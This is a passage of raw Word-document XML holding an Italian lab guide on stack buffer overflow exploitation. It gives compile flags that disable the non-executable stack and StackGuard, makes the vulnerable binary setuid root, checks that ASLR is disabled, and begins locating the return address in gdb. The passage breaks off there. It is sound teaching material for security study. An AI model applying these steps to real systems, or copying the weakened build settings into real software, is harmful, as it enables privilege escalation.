    <w:p w14:paraId="3977924E" w14:textId="77777777" w:rsidR="00DD5D8B" w:rsidRPr="00A22DD2" w:rsidRDefault="00DD5D8B" w:rsidP="000500D2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43FE" w:rsidRPr="00A22DD2" w14:paraId="56CA1D84" w14:textId="77777777" w:rsidTr="00281380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7071C01" w14:textId="08380001" w:rsidR="006E43FE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bookmarkStart w:id="1" w:name="_Hlk27053878"/>
            <w:r w:rsidRPr="00A22DD2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">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gcc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-o stack -z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execstack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r w:rsidR="00DA0627" w:rsidRPr="00A22DD2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">-m32 </w:t>
            </w:r>
            <w:r w:rsidRPr="00A22DD2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>-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fno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-stack-protector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stack.c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</w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="1"/>
    <w:p w14:paraId="22DE60B2" w14:textId="5554CF92" w:rsidR="006E43FE" w:rsidRPr="00A22DD2" w:rsidRDefault="00DD5D8B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br/>
      </w:r>
      <w:r w:rsidRPr="00A22DD2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Notare che la compilazione del documento richiede dei parametri ben precisi riportati di seguito:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A532E37" w14:textId="72E2FA4C" w:rsidR="000500D2" w:rsidRPr="00A22DD2" w:rsidRDefault="000500D2" w:rsidP="00DD5D8B">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A22DD2">
        <w:rPr>
          <w:b/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">-z </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A22DD2">
        <w:rPr>
          <w:b/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>execstack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A22DD2">
        <w:rPr>
          <w:b/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A22DD2">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A22DD2">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">Di default gli </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A22DD2">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>stacks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A22DD2">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> non sono eseguibili per evitare iniezione di codice malizioso; questa contromisura è chiama non-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A22DD2">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>executable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A22DD2">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A22DD2">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>stack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A22DD2">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">. Dato che anche il compilatore </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A22DD2">
        <w:rPr>
          <w:i/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A22DD2">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> prevede di default che gli </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A22DD2">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>stacks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A22DD2">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> non siano eseguibili, questo parametro permette al programma vulnerabile compilato di eseguire codice all’interno dello </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A22DD2">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>stack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A22DD2">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D773409" w14:textId="65A00CA8" w:rsidR="0072694C" w:rsidRPr="00A22DD2" w:rsidRDefault="0072694C" w:rsidP="00DD5D8B">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A22DD2">
        <w:rPr>
          <w:b/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>-m32:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A22DD2">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Permette di compilare il codice utilizzato la versione 32-bit </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A22DD2">
        <w:rPr>
          <w:i/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A22DD2">
        <w:rPr>
          <w:i/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F11B08" w14:textId="52D606CE" w:rsidR="0057247C" w:rsidRDefault="000500D2" w:rsidP="0057247C">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A22DD2">
        <w:rPr>
          <w:b/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A22DD2">
        <w:rPr>
          <w:b/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>fno-stack-protector</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A22DD2">
        <w:rPr>
          <w:b/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A22DD2">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Di default all’interno dello </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A22DD2">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>stack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A22DD2">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> sono anche aggiunti dei dati e controlli particolari per prevenire l’occorrenza di BO, questa contromisura è chiama </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A22DD2">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>StackGuard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A22DD2">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>. Questo parametro permette di compilare il codice vulnerabile in questione senza questi controlli.</w:t>
      </w:r>
      <w:r w:rsidR="00DA0627" w:rsidRPr="00A22DD2">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CFF150" w14:textId="4A74AAFD" w:rsidR="0057247C" w:rsidRDefault="0057247C" w:rsidP="0057247C">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>È necessario inoltre dare i permessi di root al file compilato dal programma vulnerabile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D07ABB" w14:textId="77777777" w:rsidR="0057247C" w:rsidRPr="0057247C" w:rsidRDefault="0057247C" w:rsidP="0057247C">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:line="276" w:lineRule="auto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D5D8B" w:rsidRPr="00A22DD2" w14:paraId="5C61D865" w14:textId="77777777" w:rsidTr="00281380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730E2A5" w14:textId="77777777" w:rsidR="00DD5D8B" w:rsidRPr="00A22DD2" w:rsidRDefault="00DD5D8B" w:rsidP="0028138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sudo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chown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root stack </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2973D93E" w14:textId="77777777" w:rsidR="00DD5D8B" w:rsidRPr="00A22DD2" w:rsidRDefault="00DD5D8B" w:rsidP="0028138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sudo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chmod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4755 stack</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7071F914" w14:textId="77777777" w:rsidR="00DD5D8B" w:rsidRPr="00A22DD2" w:rsidRDefault="00DD5D8B" w:rsidP="00DD5D8B">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01D64DCE" w14:textId="2923895D" w:rsidR="0057247C" w:rsidRDefault="0057247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>Per poter verificare il funzionamento del programma vulnerabile appena implementato è utile andare a verificare il suo comportamento su due input differenti: uno valido, quindi una stringa di lunghezza inferiore ai 100 caratteri, e uno invece non valido, quindi una stringa con lunghezza superiore. Se il codice è stato scritto correttamente, il risultato dovrebbe essere il seguente:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53596B2F" w14:textId="17D0E063" w:rsidR="0057247C" w:rsidRDefault="0057247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433CECD0" w14:textId="3ACF7A18" w:rsidR="0057247C" w:rsidRPr="0057247C" w:rsidRDefault="0057247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b/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0057247C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Input valido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247C" w:rsidRPr="00A22DD2" w14:paraId="717D95BD" w14:textId="77777777" w:rsidTr="00281380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117F7DE" w14:textId="77777777" w:rsidR="00D82D77" w:rsidRDefault="0057247C" w:rsidP="00281380">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>$ echo "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>aaaa</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">" &gt; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>badfile</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>$ .</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">/stack </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6355E6A1" w14:textId="0F8C9F0C" w:rsidR="0057247C" w:rsidRPr="00A22DD2" w:rsidRDefault="0057247C" w:rsidP="0028138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>
              <w:t xml:space="preserve">Returned Properly </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1D6523A2" w14:textId="57AA5FDF" w:rsidR="0057247C" w:rsidRDefault="0057247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3E2CC53B" w14:textId="63CC6F0E" w:rsidR="0057247C" w:rsidRPr="0057247C" w:rsidRDefault="0057247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b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0057247C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Input non </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0057247C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>valido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247C" w:rsidRPr="00A22DD2" w14:paraId="443CF68A" w14:textId="77777777" w:rsidTr="00281380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17157AB" w14:textId="1021B06B" w:rsidR="0057247C" w:rsidRPr="00A22DD2" w:rsidRDefault="0057247C" w:rsidP="0028138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>
              <w:t>$ echo "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>aaa</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>...(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">100 characters omitted)... </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>aaa</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">" &gt; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>badfile</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">$ ./stack </w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>Segmentation fault (core dumped)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="734DF9B4" w14:textId="5B2AA5D4" w:rsidR="001B651B" w:rsidRDefault="001B651B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0E28AA02" w14:textId="77777777" w:rsidR="001B651B" w:rsidRDefault="001B651B">
      <w:pPr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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0790F596" w14:textId="77777777" w:rsidR="006E43FE" w:rsidRPr="00A22DD2" w:rsidRDefault="00A22DD2" w:rsidP="00A22DD2">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:line="276" w:lineRule="auto"/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</w:pPr>
      <w:r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lastRenderedPageBreak/>
        <w:t xml:space="preserve">c) </w:t>
      </w:r>
      <w:r w:rsidR="00E93A64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>Controllare che l’ASLR sia disabilitato</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57458AAA" w14:textId="21E579A5" w:rsidR="001B651B" w:rsidRDefault="001B651B" w:rsidP="001B651B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7B787944" w14:textId="781CC6F2" w:rsidR="001B651B" w:rsidRDefault="001B651B" w:rsidP="001B651B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>Per assicurarsi che l’ASLR sia effettivamente disabilitato sulla macchina su cui si sta cercando di eseguire l’attacco, si può verificare andando ad eseguire il seguente script C:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030917F8" w14:textId="0EE947DC" w:rsidR="001B651B" w:rsidRDefault="001B651B" w:rsidP="001B651B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6767055" w14:textId="20A3700D" w:rsidR="001B651B" w:rsidRPr="00A22DD2" w:rsidRDefault="001B651B" w:rsidP="001B651B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1B651B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">ASLR </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B651B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Checker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B651B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT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lang w:val="it-IT"/>
        </w:rPr>
        <w:t>prog.c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43FE" w:rsidRPr="00A22DD2" w14:paraId="2468B45B" w14:textId="77777777" w:rsidTr="00281380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9CA6289" w14:textId="77777777" w:rsidR="006E43FE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#include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t>void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fun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c(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int* a1)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t xml:space="preserve">{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       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printf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(" :: a1’s address is 0x%x \n", (unsigned int) &amp;a1);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t xml:space="preserve">}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t xml:space="preserve">int main()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t xml:space="preserve">{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        </w:t>
            </w:r>
            <w:r w:rsidRPr="00A22DD2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">int x = 3; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B1B6118" w14:textId="7D835240" w:rsidR="006E43FE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func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(&amp;x);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        </w:t>
            </w:r>
            <w:r w:rsidRPr="00A22DD2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">return 1;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t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="50B7E65E" w14:textId="100AE644" w:rsidR="006E43FE" w:rsidRDefault="006E43FE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0D308763" w14:textId="2F94BCA2" w:rsidR="001B651B" w:rsidRPr="00652558" w:rsidRDefault="001B651B" w:rsidP="00711920">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr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 xml:space="preserve">Dopo aver compilato con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> il programma </w:t>
      </w:r>
      <w:r w:rsidR="00652558">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">si può semplicemente eseguirlo e vedere se gli indirizzi mostrati sono uguali o meno. </w:t>
      </w:r>
      <w:r w:rsidR="00652558">
        <w:rPr>
          <w:lang w:val="it-IT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43FE" w:rsidRPr="00A22DD2" w14:paraId="6F3D703A" w14:textId="77777777" w:rsidTr="00281380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0FD41FF" w14:textId="77777777" w:rsidR="008B70F6" w:rsidRPr="001B651B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  <w:r w:rsidRPr="001B651B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="it-IT"/>
              </w:rPr>
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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>gcc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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 xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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>prog.c</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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 xml:space="preserve"> -o </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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>prog</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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 xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E23670A" w14:textId="77777777" w:rsidR="008B70F6" w:rsidRPr="001B651B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</w:p>
          <w:p w14:paraId="344E5F8E" w14:textId="77777777" w:rsidR="008B70F6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$ .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/prog </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E60B7B1" w14:textId="428374D5" w:rsidR="006E43FE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</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="006E43FE" w:rsidRPr="00A22DD2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>::</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="006E43FE" w:rsidRPr="00A22DD2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> a1’s address is 0xbffff370 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F4DF056" w14:textId="77777777" w:rsidR="006E43FE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548A473" w14:textId="77777777" w:rsidR="008B70F6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$ .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/prog </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F93AC15" w14:textId="32569191" w:rsidR="006E43FE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</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="006E43FE" w:rsidRPr="00A22DD2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>::</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="006E43FE" w:rsidRPr="00A22DD2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> a1’s address is 0xbffff37</w:t>
            </w:r>
            <w:r w:rsidR="001B651B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="542A0FD5" w14:textId="77777777" w:rsidR="00652558" w:rsidRDefault="0065255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33BDF80A" w14:textId="65965AE6" w:rsidR="006E43FE" w:rsidRPr="00652558" w:rsidRDefault="0065255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bookmarkStart w:id="2" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">Se coincidono vuol dire che l’ASLR è stato disattivato con successo, se invece sono diversi significa che l’ASLR è ancora attivo, quindi si deve ripetere il comando riportato nella sezione </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>a)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> di questa guida.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A84648" w14:textId="0ACC5C8E" w:rsidR="008B70F6" w:rsidRPr="00A22DD2" w:rsidRDefault="008B70F6" w:rsidP="00711920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55159BAB" w14:textId="223FE950" w:rsidR="008B70F6" w:rsidRPr="00662326" w:rsidRDefault="00662326" w:rsidP="00662326">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/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</w:pPr>
      <w:r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 xml:space="preserve">d) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E93A64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>Individuare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E93A64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 xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E93A64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>il</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E93A64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 xml:space="preserve"> Return Address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70F6" w:rsidRPr="00A22DD2" w14:paraId="01F61E90" w14:textId="77777777" w:rsidTr="00281380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0E450A1" w14:textId="5319C4EB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gcc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-z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execstack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-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fno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-stack-protector -g -o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stack_dbg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stack.c</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="115C3F1A" w14:textId="1AED787A" w:rsidR="008B70F6" w:rsidRPr="00A22DD2" w:rsidRDefault="008B70F6" w:rsidP="00711920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70F6" w:rsidRPr="00A22DD2" w14:paraId="30F0EC50" w14:textId="77777777" w:rsidTr="00281380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DBA8441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gcc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-z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execstack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-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fno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-stack-protector -g -o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stack_dbg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stack.c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</w:p>
          <w:p w14:paraId="73F60F0F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1893AAE6" w14:textId="2722731F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touch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stack_dbg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GNU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(Ubuntu 7.11.1-0ubuntu1˜16.04) 7.11.1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t xml:space="preserve">......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</w:p>
          <w:p w14:paraId="7D3F8F4C" w14:textId="349FBFAE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) b </w:t>
            </w:r>
            <w:r w:rsidRPr="00A22DD2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>foo</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="669D05B5" w14:textId="6FA73F34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lastRenderedPageBreak/>
              <w:t xml:space="preserve">Breakpoint 1 at 0x804848a: file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stack.c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, line 14.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) run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t xml:space="preserve">......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t xml:space="preserve">Breakpoint 1, foo (str=0xbfffeb1c "...") at stack.c:10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t xml:space="preserve">10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strcpy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buffer, str);</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2333A45B" w14:textId="2FF0EA87" w:rsidR="008B70F6" w:rsidRPr="00A22DD2" w:rsidRDefault="008B70F6" w:rsidP="00711920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70F6" w:rsidRPr="00A22DD2" w14:paraId="2A46150D" w14:textId="77777777" w:rsidTr="00281380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D51E30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 p $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ebp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</w:p>
          <w:p w14:paraId="507C0277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$1 = (void *) 0xbfffeaf8 </w:t>
            </w:r>
          </w:p>
